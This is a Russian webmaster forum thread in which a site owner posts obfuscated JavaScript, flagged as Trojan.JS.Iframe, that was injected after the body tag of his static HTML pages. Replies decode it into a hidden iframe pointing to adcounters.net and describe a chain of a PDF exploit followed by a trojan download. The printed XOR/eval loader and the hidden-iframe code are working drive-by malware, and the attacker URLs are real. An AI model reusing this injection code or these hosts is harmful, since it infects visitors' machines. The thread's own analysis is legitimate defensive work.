- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Вчера на сайте на главной странице в источнике увидел кусок вируса. Касперский опознал его как "Тrojan.JS.Iframe.ef" Мастерхоcт уверил, что вирус появился с локала при заливке страниц сайта по ftp. Что удивительно, сайт не на движке - обычные hml-страницы. :) Вирус присоседился сразу за тегом <body>. Естественно, все пароли (ftp) сменил, локальный комп был просканирован, антишпион поставлен - вроде все чисто... Еще, запросил лог доступа по ftp.
Ниже привожу код вируса (заменил скрипт=script).
Что там записано на JS? Какие действия? :madd:
Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,
30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,
24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,
91,86,78,10,21,89,88,89,82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,114,91,82,90,82,89,67,68,117,78,
99,86,80,121,86,90,82,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82,89,83,116,95,94,91,83,31,81,69,
30,12,61);oa="";jnyh=String.fromCharCode;tl=55;for(vf
in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</скрипт>
fr.src="http://adcounters.net/far/show.php?s=eb31d196fc";
fr.style.display="none";
document.getElementsByTagName('body')[0].appendChild(fr);
вот такие там действия :)
спасибо :)
счетчик так накручивает... :) а можно как-то вычислить по id= eb31d196fc - кто это?
спасибо :)
счетчик так накручивает... :) а можно как-то вычислить по id= eb31d196fc - кто это?
какой счетчик, там фрейм на эксплойт был
админка h_tp://adcounters.net/far/admin.php
счетчик так накручивает... а можно как-то вычислить по id= eb31d196fc - кто это?
если вычислите, отпишитесь :)
Fr3d, можно подробнее, pls, что это и с чем едят? :)
Впервые сталкиваюсь...
исполняется это
потом грузится закодированное вот это
- ГС для отвода глаз + сплоит, который открывает httр://adcounters.net/far/pdf.php, тем самым запускает acrobat reader и исполняет это
lyoxa добавил 15.01.2010 в 15:21
который открывшись в окне браузера выполняет это
lyoxa добавил 15.01.2010 в 15:22
а тут сами уже ))
а тут сами уже ))
не осилю :) Этот код может воровать пароли и куда отсылает?
Жесть, я тоже как то ловил js на сайте у себя, но я думал банально посещалку накручивали
httр://adcounters.net/far/pdf.php
у меня антивирь сругался на пдку эту)
Продолжение )
Последний код качает и выполняет exe файл http://adcounters.net/far/load.php?e=2
который последним DrWeb'ом распознается как "Trojan.DownLoad.35952"
А что он там уже качает незнаю ))